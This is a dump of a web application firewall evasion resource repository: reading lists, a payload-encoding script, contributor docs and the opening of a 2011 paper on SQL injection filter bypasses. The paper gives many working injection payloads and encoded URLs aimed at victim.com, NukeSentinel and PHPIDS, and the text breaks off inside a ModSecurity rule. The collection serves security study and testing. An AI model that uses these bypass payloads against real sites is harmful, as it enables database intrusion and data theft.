├── images ├── how-wafs-work.png ├── waf-general-arch.png └── character-interpretations.png ├── papers ├── Poking A Hole In The Firewall.pdf ├── WASC WAF Evaluation Criteria.pdf ├── SANS Guide - WAF Evasion Testing.pdf ├── Bypassing WAF XSS Detection Mechanisms.pdf ├── Qualys Guide - Protocol-Level WAF Evasion.pdf ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf ├── Evading All Web-Application Firewalls XSS Filters.pdf ├── Web Application Firewalls - Evaluation and Analysis.pdf ├── Artificial Neural Network based WAF for SQL Injection.pdf ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf └── Beyond SQLi - Obfuscate and Bypass WAFs.txt ├── presentations ├── Playing Around with WAFs.pdf ├── OWASP WAF Profiling & Evasion.pdf ├── A Forgotten HTTP Invisibility Cloak.pdf ├── WAF Bypasses and PHP Exploits (Slides).pdf ├── Methods To Bypass A Web Application Firewall.pdf ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf ├── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf └── Building Your Own WAF as a Service and Forgetting about False Positives.pdf ├── others ├── README.md └── obfu.py ├── LICENSE ├── .gitignore ├── contributing.md └── code-of-conduct.md /images/how-wafs-work.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/how-wafs-work.png -------------------------------------------------------------------------------- /images/waf-general-arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/waf-general-arch.png -------------------------------------------------------------------------------- /images/character-interpretations.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/images/character-interpretations.png -------------------------------------------------------------------------------- /papers/Poking A Hole In The Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Poking A Hole In The Firewall.pdf -------------------------------------------------------------------------------- /papers/WASC WAF Evaluation Criteria.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/WASC WAF Evaluation Criteria.pdf -------------------------------------------------------------------------------- /papers/SANS Guide - WAF Evasion Testing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/SANS Guide - WAF Evasion Testing.pdf -------------------------------------------------------------------------------- /presentations/Playing Around with WAFs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Playing Around with WAFs.pdf -------------------------------------------------------------------------------- /presentations/OWASP WAF Profiling & Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/OWASP WAF Profiling & Evasion.pdf -------------------------------------------------------------------------------- /papers/Bypassing WAF XSS Detection Mechanisms.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Bypassing WAF XSS Detection Mechanisms.pdf -------------------------------------------------------------------------------- /papers/Qualys Guide - Protocol-Level WAF Evasion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Qualys Guide - Protocol-Level WAF Evasion.pdf -------------------------------------------------------------------------------- /presentations/A Forgotten HTTP Invisibility Cloak.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/A Forgotten HTTP Invisibility Cloak.pdf -------------------------------------------------------------------------------- /presentations/WAF Bypasses and PHP Exploits (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/WAF Bypasses and PHP Exploits (Slides).pdf -------------------------------------------------------------------------------- /papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Modern WAF Fingerprinting and XSS Filter Bypass.pdf -------------------------------------------------------------------------------- /papers/Evading All Web-Application Firewalls XSS Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Evading All Web-Application Firewalls XSS Filters.pdf -------------------------------------------------------------------------------- /papers/Web Application Firewalls - Evaluation and Analysis.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Web Application Firewalls - Evaluation and Analysis.pdf -------------------------------------------------------------------------------- /presentations/Methods To Bypass A Web Application Firewall.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Methods To Bypass A Web Application Firewall.pdf -------------------------------------------------------------------------------- /papers/Artificial Neural Network based WAF for SQL Injection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Artificial Neural Network based WAF for SQL Injection.pdf -------------------------------------------------------------------------------- /papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf -------------------------------------------------------------------------------- /presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf -------------------------------------------------------------------------------- /presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/BlackHat US 16 - Analysis of Attack Detection Logic.pdf -------------------------------------------------------------------------------- /presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Our Favourite XSS WAF Filters And How To Bypass Them.pdf -------------------------------------------------------------------------------- /papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/papers/Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf -------------------------------------------------------------------------------- /presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf -------------------------------------------------------------------------------- /presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf -------------------------------------------------------------------------------- /presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-firewall/HEAD/presentations/Building Your Own WAF as a Service and Forgetting about False Positives.pdf -------------------------------------------------------------------------------- /others/README.md: -------------------------------------------------------------------------------- 1 | ## [`obfu.py`](https://github.com/0xinfection/awesome-waf/blob/master/others/obfu.py) 2 | > A small script to encode and obfuscate your payloads easily to your desired encodings. 3 | 4 | ### Usage: 5 | ``` 6 | $ python obfu.py -h 7 | 8 | OBFUSCATOR 9 | 10 | usage: python3 obfu.py [-h] [-s STR] [-e ENC] [-ueo] [-udi] 11 | 12 | Required Arguments: 13 | -s STR, --str STR String to obfuscate 14 | -e ENC, --enc ENC Encoding type. eg: ibm037, utf16, etc 15 | 16 | Optional Arguments: 17 | -ueo URL Encode Output 18 | -udi URL Decode Input 19 | ``` 20 | ### Example Usage: 21 | ``` 22 | $ python3 obfu.py -s 'param= 21 | git checkout -b my-new-feature master 22 | git commit -a 23 | git push origin my-new-feature 24 | ``` 25 | 26 | ### Staying In Sync With Upstream 27 | 28 | When your branch gets out of sync with the paulveillard/master branch, use the following to update: 29 | 30 | ``` shell 31 | git checkout my-new-feature 32 | git fetch -a 33 | git pull --rebase upstream master 34 | git push --force-with-lease origin my-new-feature 35 | ``` 36 | 37 | ### Updating pull requests 38 | 39 | If your PR fails to pass CI or needs changes based on code review, you'll most likely want to squash these changes into 40 | existing commits. 41 | 42 | If your pull request contains a single commit or your changes are related to the most recent commit, you can simply 43 | amend the commit. 44 | 45 | ``` shell 46 | git add . 47 | git commit --amend 48 | git push --force-with-lease origin my-new-feature 49 | ``` 50 | 51 | If you need to squash changes into an earlier commit, you can use: 52 | 53 | ``` shell 54 | git add . 55 | git commit --fixup 56 | git rebase -i --autosquash master 57 | git push --force-with-lease origin my-new-feature 58 | ``` 59 | 60 | Be sure to add a comment to the PR indicating your new changes are ready to review, as GitHub does not generate a 61 | notification when you git push. 62 | 63 | ### Code Style 64 | 65 | ### Formatting Commit Messages 66 | 67 | We follow the conventions on [How to Write a Git Commit Message](http://chris.beams.io/posts/git-commit/). 68 | 69 | Be sure to include any related GitHub issue references in the commit message. See 70 | [GFM syntax](https://guides.github.com/features/mastering-markdown/#GitHub-flavored-markdown) for referencing issues 71 | and commits. 72 | 73 | ## Reporting Bugs and Creating Issues 74 | 75 | When opening a new issue, try to roughly follow the commit message format conventions above. 76 | -------------------------------------------------------------------------------- /others/obfu.py: -------------------------------------------------------------------------------- 1 | # Modified from @irsdl's script 2 | import urllib.parse, sys 3 | from argparse import ArgumentParser 4 | lackofart = ''' 5 | OBFUSCATOR 6 | ''' 7 | 8 | def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True): 9 | result = "" 10 | equalSign = "=" 11 | ampersand = "&" 12 | if '=' and '&' in params: 13 | if encodeEqualSign: 14 | equalSign = equalSign.encode(charset) 15 | if encodeAmpersand: 16 | ampersand = ampersand.encode(charset) 17 | params_list = params.split("&") 18 | for param_pair in params_list: 19 | param, value = param_pair.split("=") 20 | if urlDecodeInput: 21 | param = urllib.parse.unquote(param) 22 | value = urllib.parse.unquote(value) 23 | param = param.encode(charset) 24 | value = value.encode(charset) 25 | if urlEncodeOutput: 26 | param = urllib.parse.quote_plus(param) 27 | value = urllib.parse.quote_plus(value) 28 | if result: 29 | result += ampersand 30 | result += param + equalSign + value 31 | else: 32 | if urlDecodeInput: 33 | params = urllib.parse.unquote(params) 34 | result = params.encode(charset) 35 | if urlEncodeOutput: 36 | result = urllib.parse.quote_plus(result) 37 | return result 38 | 39 | def main(): 40 | print(lackofart) 41 | parser = ArgumentParser('python3 obfu.py') 42 | parser._action_groups.pop() 43 | 44 | # A simple hack to have required arguments and optional arguments separately 45 | required = parser.add_argument_group('Required Arguments') 46 | optional = parser.add_argument_group('Optional Arguments') 47 | 48 | # Required Options 49 | required.add_argument('-s', '--str', help='String to obfuscate', dest='str') 50 | required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc') 51 | 52 | # Optional Arguments (main stuff and necessary) 53 | optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true') 54 | optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true') 55 | args = parser.parse_args() 56 | if not len(sys.argv) > 1: 57 | parser.print_help() 58 | quit() 59 | print('Input: %s' % (args.str)) 60 | print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))) 61 | 62 | if __name__ == '__main__': 63 | main() 64 | -------------------------------------------------------------------------------- /code-of-conduct.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in 6 | ansible-security-hardening project and our community a harassment-free 7 | experience for everyone, regardless of age, body size, visible or invisible 8 | disability, ethnicity, sex characteristics, gender identity and expression, 9 | level of experience, education, socio-economic status, nationality, personal 10 | appearance, race, religion, or sexual identity and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at info@paulveillard.com. 63 | All complaints will be reviewed and investigated promptly and fairly. 64 | 65 | All community leaders are obligated to respect the privacy and security of the 66 | reporter of any incident. 67 | 68 | ## Enforcement Guidelines 69 | 70 | Community leaders will follow these Community Impact Guidelines in determining 71 | the consequences for any action they deem in violation of this Code of Conduct: 72 | 73 | ### 1. Correction 74 | 75 | **Community Impact**: Use of inappropriate language or other behavior deemed 76 | unprofessional or unwelcome in the community. 77 | 78 | **Consequence**: A private, written warning from community leaders, providing 79 | clarity around the nature of the violation and an explanation of why the 80 | behavior was inappropriate. A public apology may be requested. 81 | 82 | ### 2. Warning 83 | 84 | **Community Impact**: A violation through a single incident or series 85 | of actions. 86 | 87 | **Consequence**: A warning with consequences for continued behavior. No 88 | interaction with the people involved, including unsolicited interaction with 89 | those enforcing the Code of Conduct, for a specified period of time. This 90 | includes avoiding interactions in community spaces as well as external channels 91 | like social media. Violating these terms may lead to a temporary or 92 | permanent ban. 93 | 94 | ### 3. Temporary Ban 95 | 96 | **Community Impact**: A serious violation of community standards, including 97 | sustained inappropriate behavior. 98 | 99 | **Consequence**: A temporary ban from any sort of interaction or public 100 | communication with the community for a specified period of time. No public or 101 | private interaction with the people involved, including unsolicited interaction 102 | with those enforcing the Code of Conduct, is allowed during this period. 103 | Violating these terms may lead to a permanent ban. 104 | 105 | ### 4. Permanent Ban 106 | 107 | **Community Impact**: Demonstrating a pattern of violation of community 108 | standards, including sustained inappropriate behavior, harassment of an 109 | individual, or aggression toward or disparagement of classes of individuals. 110 | 111 | **Consequence**: A permanent ban from any sort of public interaction within 112 | the community. 113 | 114 | ## Attribution 115 | 116 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 117 | version 2.0, available at 118 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 119 | 120 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 121 | enforcement ladder](https://github.com/mozilla/diversity). 122 | 123 | [homepage]: https://www.contributor-covenant.org 124 | 125 | For answers to common questions about this code of conduct, see the FAQ at 126 | https://www.contributor-covenant.org/faq. Translations are available at 127 | https://www.contributor-covenant.org/translations. 128 | -------------------------------------------------------------------------------- /papers/Beyond SQLi - Obfuscate and Bypass WAFs.txt: -------------------------------------------------------------------------------- 1 | |=--------------------------------------------------------------------=| 2 | |=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=| 3 | |=-------------------------=[ 6 October 2011 ]=-----------------------=| 4 | |=----------------------=[ By CWH Underground ]=--------------------=| 5 | |=--------------------------------------------------------------------=| 6 | 7 | 8 | ###### 9 | Info 10 | ###### 11 | 12 | Title : Beyond SQLi: Obfuscate and Bypass 13 | Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" 14 | Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] 15 | Date : 2011-10-06 16 | 17 | 18 | ########## 19 | Contents 20 | ########## 21 | 22 | [0x00] - Introduction 23 | 24 | [0x01] - Filter Evasion (Mysql) 25 | 26 | [0x01a] - Bypass Functions and Keywords Filtering 27 | [0x01b] - Bypass Regular Expression Filtering 28 | 29 | [0x02] - Normally Bypassing Techniques 30 | 31 | [0x03] - Advanced Bypassing Techniques 32 | 33 | [0x03a] - HTTP Parameter Pollution: Split and Join 34 | [0x03b] - HTTP Parameter Contamination 35 | 36 | [0x04] - How to protect your website 37 | 38 | [0x05] - Conclusion 39 | 40 | [0x06] - References 41 | 42 | [0x07] - Greetz To 43 | 44 | 45 | ####################### 46 | [0x00] - Introduction 47 | ####################### 48 | 49 | Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on. 50 | This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection. 51 | There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system 52 | in the real world even though you spend more than 300,000 USD on a WAF. 53 | 54 | This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information. 55 | 56 | Section 0x01, we give a details of how to bypass filter including basic, function and keyword. 57 | Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF. 58 | Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination". 59 | and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution. 60 | The last, section 0x05, It's conclusion from Section 0x01-0x04. 61 | 62 | 63 | ################################# 64 | [0x01] - Filter Evasion (Mysql) 65 | ################################# 66 | 67 | This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions. 68 | This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks. 69 | 70 | +++++++++++++++++++++++++++++++++++++++++++++++++++ 71 | [0x01a] - Bypass Functions and Keywords Filtering 72 | +++++++++++++++++++++++++++++++++++++++++++++++++++ 73 | 74 | Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful. 75 | However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users 76 | when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques. 77 | 78 | 79 | Keyword filer: and, or 80 | ---------------------------------------------------------------------- 81 | PHP filter code: preg_match('/(and|or)/i', $id) 82 | 83 | THe keywords and, or are usually used as a simple test to determine whether a web application is vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or respectively. 84 | 85 | Filtered injection: 1 or 1 = 1 1 and 1 = 1 86 | Bypassed injection: 1 || 1 = 1 1 && 1 = 1 87 | ---------------------------------------------------------------------- 88 | 89 | 90 | Keyword filer: and, or, union 91 | ---------------------------------------------------------------------- 92 | PHP filter code: preg_match('/(and|or|union)/i', $id) 93 | 94 | The keyword union is generally used to generate an malicious statement in order to select extra data from the database. 95 | 96 | Filtered injection: union select user, password from users 97 | Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin' 98 | 99 | ** Remark: you have to know table name, column name and some data in the table, otherwise you have to get it from information_schema.columns table using other statement 100 | e.g. use substring function to get each character of table names. 101 | ---------------------------------------------------------------------- 102 | 103 | 104 | Keyword filer: and, or, union, where 105 | ---------------------------------------------------------------------- 106 | PHP filter code: preg_match('/(and|or|union|where)/i', $id) 107 | Filtered injection: 1 || (select user from users where user_id = 1) = 'admin' 108 | Bypassed injection: 1 || (select user from users limit 1) = 'admin' 109 | ---------------------------------------------------------------------- 110 | 111 | 112 | Keyword filer: and, or, union, where, limit 113 | ---------------------------------------------------------------------- 114 | PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id) 115 | Filtered injection: 1 || (select user from users limit 1) = 'admin' 116 | Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin' 117 | ---------------------------------------------------------------------- 118 | 119 | 120 | Keyword filer: and, or, union, where, limit, group by 121 | ---------------------------------------------------------------------- 122 | PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id) 123 | Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin' 124 | Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1 125 | ---------------------------------------------------------------------- 126 | 127 | 128 | Keyword filer: and, or, union, where, limit, group by, select 129 | ---------------------------------------------------------------------- 130 | PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id) 131 | Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 132 | Bypassed injection: 1 || 1 = 1 into outfile 'result.txt' 133 | Bypassed injection: 1 || substr(user,1,1) = 'a' 134 | ---------------------------------------------------------------------- 135 | 136 | 137 | Keyword filer: and, or, union, where, limit, group by, select, ' 138 | ---------------------------------------------------------------------- 139 | PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id) 140 | Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 141 | Bypassed injection: 1 || user_id is not null 142 | Bypassed injection: 1 || substr(user,1,1) = 0x61 143 | Bypassed injection: 1 || substr(user,1,1) = unhex(61) 144 | ---------------------------------------------------------------------- 145 | 146 | 147 | Keyword filer: and, or, union, where, limit, group by, select, ', hex 148 | ---------------------------------------------------------------------- 149 | PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id) 150 | Filtered injection: 1 || substr(user,1,1) = unhex(61) 151 | Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36)) 152 | ---------------------------------------------------------------------- 153 | 154 | 155 | Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr 156 | ---------------------------------------------------------------------- 157 | PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id) 158 | Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36)) 159 | Bypassed injection: 1 || lpad(user,7,1) 160 | ---------------------------------------------------------------------- 161 | 162 | 163 | Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space 164 | ---------------------------------------------------------------------- 165 | PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id) 166 | Filtered injection: 1 || lpad(user,7,1) 167 | Bypassed injection: 1%0b||%0blpad(user,7,1) 168 | ---------------------------------------------------------------------- 169 | 170 | 171 | From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions. 172 | Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list. 173 | 174 | Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly. 175 | 176 | 177 | +++++++++++++++++++++++++++++++++++++++++++++++ 178 | [0x01b] - Bypass Regular Expression Filtering 179 | +++++++++++++++++++++++++++++++++++++++++++++++ 180 | 181 | Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server. 182 | However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6. 183 | 184 | PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols. 185 | 186 | [Code]--------------------------------------------------------------- 187 | filtered injection: 1 or 1 = 1 188 | Bypassed injection: 1 or 1 189 | [End Code]----------------------------------------------------------- 190 | 191 | [Code]--------------------------------------------------------------- 192 | filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users' 193 | filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z' 194 | filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122) 195 | Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a 196 | Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273 197 | [End Code]----------------------------------------------------------- 198 | 199 | 200 | 201 | ######################################## 202 | [0x02] - Normally Bypassing Techniques 203 | ######################################## 204 | 205 | In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF? 206 | 207 | A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. 208 | Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, 209 | many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified. 210 | WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers. 211 | Some modern WAF systems work both with attack signatures and abnormal behavior. 212 | 213 | Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !! 214 | 215 | 216 | 1. Bypass with Comments 217 | 218 | SQL comments allow us to bypass a lot of filtering and WAFs. 219 | 220 | [Code]--------------------------------------------------------------- 221 | http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3-- 222 | [End Code]----------------------------------------------------------- 223 | 224 | 225 | 2. Case Changing 226 | 227 | Some WAFs filter only lowercase SQL keyword. 228 | 229 | Regex Filter: /union\sselect/g 230 | 231 | [Code]--------------------------------------------------------------- 232 | http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3-- 233 | [End Code]----------------------------------------------------------- 234 | 235 | 236 | 3. Replaced keywords 237 | 238 | Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily. 239 | 240 | [Code]--------------------------------------------------------------- 241 | http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3-- 242 | [End Code]----------------------------------------------------------- 243 | 244 | Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass. 245 | 246 | [Code]--------------------------------------------------------------- 247 | http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3-- 248 | [End Code]----------------------------------------------------------- 249 | 250 | For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/". 251 | 252 | Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html 253 | Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html 254 | 255 | 256 | 257 | 4. Character encoding 258 | 259 | Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so 260 | double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep 261 | decoding the SQL statement executing 262 | 263 | [Code]----------------------------------------------------------------------------------------------------------------- 264 | http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- 265 | [End Code]------------------------------------------------------------------------------------------------------------- 266 | 267 | Moreover, these techniques can combine to bypass Citrix Netscaler 268 | - Remove all "NULL" words 269 | - Use query encoding in some parts 270 | - Remove the single quote character "'" 271 | - And Have fun !! 272 | Credit: Wendel Guglielmetti Henrique 273 | 274 | and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character. 275 | 276 | 277 | #Real World Example 278 | 279 | 1. NukeSentinel (Nuke Evolution) 280 | 281 | [Nukesentinel.php Code]------------------------------------------------------------ 282 | // Check for UNION attack 283 | // Copyright 2004(c) Raven PHP Scripts 284 | $blocker_row = $blocker_array[1]; 285 | if($blocker_row['activate'] > 0) { 286 | if (stristr($nsnst_const['query_string'],'+union+') OR \ 287 | stristr($nsnst_const['query_string'],'%20union%20') OR \ 288 | stristr($nsnst_const['query_string'],'*/union/*') OR \ 289 | stristr($nsnst_const['query_string'],' union ') OR \ 290 | stristr($nsnst_const['query_string_base64'],'+union+') OR \ 291 | stristr($nsnst_const['query_string_base64'],'%20union%20') OR \ 292 | stristr($nsnst_const['query_string_base64'],'*/union/*') OR \ 293 | stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); 294 | die("BLOCK IP 1 " ); 295 | } 296 | } 297 | [End Code]------------------------------------------------------------------------- 298 | 299 | We can bypass their filtering with these script: 300 | 301 | Forbidden: http://victim.com/php-nuke/?/**/union/**/select….. 302 | Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select… 303 | Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect… 304 | 305 | 306 | 2. Mod Security CRS (Credit: Johannes Dahse) 307 | 308 | [SecRule]-------------------------------------------------------------------------- 309 | SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none, 310 | 